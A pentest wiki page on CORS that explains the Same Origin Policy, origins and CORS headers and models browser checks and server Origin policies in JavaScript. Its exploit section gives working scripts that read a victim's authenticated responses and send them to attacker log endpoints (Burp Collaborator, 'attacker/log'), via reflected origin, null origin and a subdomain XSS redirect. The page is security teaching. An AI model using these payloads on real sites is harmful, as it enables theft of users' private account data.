wiki.hackerlab.cz

CORS

Cross-Origin Resource Sharing (CORS) pentest notes

Last updated 1 year ago

Browser Security Mechanisms

Cross-Origin Resource Sharing (CORS) is a mechanism that relaxes the Same Origin Policy (SOP). Both are browser security mechanisms that limit what the JavaScript runtime may read from a different origin (or domain, for simplicity).

Same Origin Policy (SOP)

JavaScript can send a request to a different "domain", but by default the browser does not hand the response back to the JavaScript runtime. The rule is simple: if the origin of the page running the script differs from the origin of the requested resource, the browser withholds the response. Note that the request itself is still sent, cookies included, so any server-side effect still happens (this is what CSRF relies on); SOP only stops the script from reading the reply.

The SOP has exceptions that allow cross-domain resources to be embedded, as opposed to read. A page may load an image, a font, a stylesheet or JavaScript source code from a different origin. So yes, you can load and execute JavaScript from another origin with a <script src> tag, but the page cannot read that script's text as data, and when the script runs it does so with the origin of the embedding page, so the responses to any cross-origin requests it makes are still withheld under SOP.

What's Origin

An origin is the unit on which SOP and CORS decisions are made. It is the combination of scheme (protocol), host (domain) and port, and it identifies the "source" of a particular resource. The origin cannot simply be the domain, because several web applications can share one host and differ only in port or protocol: https://example.com, http://example.com and https://example.com:8443 are three different origins.

When JavaScript makes a cross-origin request, the browser adds the HTTP header Origin: scheme://host[:port] (the port is omitted when it is the default for the scheme) so the server can decide which CORS headers to return. The server's answer does not prevent the request from reaching it; when the response comes back, the browser compares the CORS headers with the requesting page's origin and applies the SOP and CORS rules to decide whether the script may read it.

CORS headers

The server can return the following CORS headers to relax the SOP:

Access-Control-Allow-Origin: origin names the single origin that is allowed to read the response. The browser compares it with the requesting page's origin as an exact string; only one origin may be given, and the wildcard * is the only alternative.

Access-Control-Allow-Credentials: true allows credentialed requests. The browser then attaches the user's cookies (or browser-managed HTTP authentication) when JavaScript sets withCredentials, and hands the authenticated response to the script. Browsers refuse this combination with Access-Control-Allow-Origin: *, which is why a misconfigured server has to echo a concrete origin for an attack to work.
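The following added example (it is not code from the original page) models in JavaScript the check a browser performs before releasing a cross-origin response to the page's script, and also shows how the origin of a URL is derived for the What's Origin section above. The origins and header values are constructed for illustration.

```javascript
// Added example, not from the original page: a model of the decision a browser
// makes before handing a cross-origin response to a page's script.
// Origins and header values used here are constructed for illustration.

// Origin = scheme + host + port. Default ports are dropped and the path is
// ignored, exactly as the browser serializes the Origin header.
function originOf(url) {
  return new URL(url).origin;
}

// Does the browser let the script running at `pageOrigin` read a response that
// came back with `headers`? Mirrors the SOP/CORS rules:
//  - no Access-Control-Allow-Origin (ACAO)  -> blocked (plain SOP)
//  - ACAO: *                                -> allowed, but never with credentials
//  - ACAO: <origin string>                  -> allowed only if it equals pageOrigin
//  - a credentialed request additionally needs Access-Control-Allow-Credentials: true
function browserAllowsResponse(pageOrigin, headers, withCredentials) {
  // header names are case-insensitive
  const h = {};
  for (const [name, value] of Object.entries(headers)) h[name.toLowerCase()] = value;

  const acao = h['access-control-allow-origin'];
  const acac = h['access-control-allow-credentials'];

  if (acao === undefined) return false;                 // server did not opt in
  if (withCredentials && acac !== 'true') return false; // cookies need ACAC: true
  if (acao === '*') return !withCredentials;            // wildcard never with credentials

  // A single origin, compared as an exact string: no lists, no patterns,
  // and http://host is not https://host.
  return acao === pageOrigin;
}

// Constructed walk-through: an attacker page at https://attacker.example
// reading https://app.example.com/account with the victim's cookies.
function demo() {
  const attacker = originOf('https://attacker.example/exploit.html');
  const reflected = {
    'Access-Control-Allow-Origin': attacker,      // server echoed the Origin header
    'Access-Control-Allow-Credentials': 'true',
  };
  const wildcard = { 'Access-Control-Allow-Origin': '*' };
  return {
    reflectedWithCookies: browserAllowsResponse(attacker, reflected, true),   // true
    wildcardWithCookies: browserAllowsResponse(attacker, wildcard, true),     // false
    wildcardAnonymous: browserAllowsResponse(attacker, wildcard, false),      // true
  };
}
```

The model explains why the exploits later on this page all set withCredentials = true and need the server to echo a concrete origin: a wildcard leaks only unauthenticated content, and a fixed origin that is not the attacker's leaks nothing.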

Pentesting CORS

A practical CORS attack needs the target to respond with Access-Control-Allow-Origin set to an origin the attacker controls or can run script in, together with Access-Control-Allow-Credentials: true; without the credentials header the leaked response is unauthenticated and usually of little value. An XSS is not required in general: for a reflected or null origin the attacker page can live on the attacker's own host. An XSS (or a man-in-the-middle position for plain http) is only needed when the trusted origin is a subdomain the attacker does not own.

The CORS misconfigurations covered here are reflected origin, null origin, and a trusted insecure protocol or subdomain.
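To make the three misconfigurations concrete, here is an added example (not code from the original page) that models three server-side ways of answering the Origin header and probes each one with the Origin values a pentester would replay in Burp Repeater: the attacker's own domain, the null origin a sandboxed iframe produces, a plain-http subdomain, a registered look-alike domain, and a legitimate origin as a control. The host names victim.example and attacker.example are assumptions.

```javascript
// Added example, not from the original page. Three constructed server-side
// Origin policies, probed the way a pentester probes a real target: resend the
// request with attacker-chosen Origin values and look at what comes back.
// victim.example / attacker.example are assumed names.

// 1) Reflected origin: whatever the client sends comes straight back.
function reflectPolicy(origin) {
  return {
    'Access-Control-Allow-Origin': origin,
    'Access-Control-Allow-Credentials': 'true',
  };
}

// 2) "Trusted subdomains" done loosely: a suffix match on the host name that
//    ignores the scheme (so http:// is accepted) and is not anchored on the
//    dot (so evilvictim.example passes as well).
function looseSubdomainPolicy(origin) {
  let host;
  try { host = new URL(origin).hostname; } catch (e) { return {}; } // "null" is not a URL
  if (host.endsWith('victim.example')) {
    return {
      'Access-Control-Allow-Origin': origin,
      'Access-Control-Allow-Credentials': 'true',
    };
  }
  return {};
}

// 3) Strict allowlist: exact match on whole origin strings, https only, and the
//    literal string "null" can never be on the list. Vary: Origin keeps shared
//    caches from serving one origin's answer to another.
const ALLOWED_ORIGINS = new Set(['https://victim.example', 'https://app.victim.example']);
function strictPolicy(origin) {
  if (!ALLOWED_ORIGINS.has(origin)) return {};
  return {
    'Access-Control-Allow-Origin': origin,
    'Access-Control-Allow-Credentials': 'true',
    'Vary': 'Origin',
  };
}

// Origins an attacker can realistically send (constructed probe list):
//  - own domain                     (origin reflection)
//  - null                           (sandboxed iframe, file://, some redirects)
//  - plain-http subdomain           (insecure protocol, needs MITM)
//  - look-alike registered domain   (unanchored suffix match)
//  - domain that starts with victim (unanchored prefix match)
//  - a genuine subdomain            (control; legitimately trusted)
const PROBE_ORIGINS = [
  'https://attacker.example',
  'null',
  'http://app.victim.example',
  'https://evilvictim.example',
  'https://victim.example.attacker.example',
  'https://app.victim.example',
];

// Which probe origins would a policy let read credentialed responses?
// "Accepted" means the exact probe value is echoed in ACAO and ACAC is true,
// which is the combination the browser model above requires.
function acceptedOrigins(policy) {
  return PROBE_ORIGINS.filter((o) => {
    const h = policy(o);
    return h['Access-Control-Allow-Origin'] === o &&
           h['Access-Control-Allow-Credentials'] === 'true';
  });
}
```

Any probe origin that comes back echoed with Access-Control-Allow-Credentials: true is exploitable from an attacker page on that origin: the reflecting policy accepts all six, the loose subdomain policy accepts the http subdomain and the look-alike domain in addition to the genuine one, and the strict allowlist accepts only the control.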

Origin reflection

<script>
    // Attacker page hosted on the attacker's own origin. The target echoes any
    // Origin value into Access-Control-Allow-Origin and sends
    // Access-Control-Allow-Credentials: true, so the victim's session rides along.
    var req = new XMLHttpRequest();
    req.onload = reqListener;
    req.open('get','https://domain/URI',true);
    req.withCredentials = true;   // attach the victim's cookies
    req.send();

    function reqListener() {
        // exfiltrate the authenticated response body to the attacker's log endpoint
        // (encoded so '&' or '#' in the body cannot truncate the query string)
        location='https://burpcollaborator.domain/log?key='+encodeURIComponent(this.responseText);
    };
</script>

Null origin

Browsers send Origin: null for requests made from sandboxed iframes (and from file:// pages and some cross-origin redirects). If the server echoes that value, answering with Access-Control-Allow-Origin: null and Access-Control-Allow-Credentials: true, the attacker page runs the same credentialed XHR as above inside an <iframe sandbox="allow-scripts"> with a srcdoc document: the request is sent from the null origin, carries the victim's cookies, and the response is handed to the script.

Insecure protocol or subdomain

The target trusts its subdomains: an origin of the form http://anything.domain is echoed back with Access-Control-Allow-Credentials: true. The attacker cannot run script on such a subdomain directly, but an XSS exists in the app on subdomain.domain, so the attacker page redirects the victim there with the XHR payload in the vulnerable productId parameter. The injected script then runs with the trusted subdomain origin and can read the response from https://domain/sensitiveURI.

<script>
    // Attacker page: send the victim to the XSS on the trusted subdomain.
    // The reflected parameter carries the same credentialed XHR as above;
    // %2b and %3c are URL-encoded '+' and '<' so the payload survives the redirect.
    document.location="http://subdomain.domain/?productId=4<script>var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://domain/sensitiveURI',true); req.withCredentials = true;req.send();function reqListener() {location='https://attacker/log?key='%2bthis.responseText; };%3c/script>&storeId=1"
</script>

References

Same Origin Policy (SOP).
https://portswigger.net/web-security/cors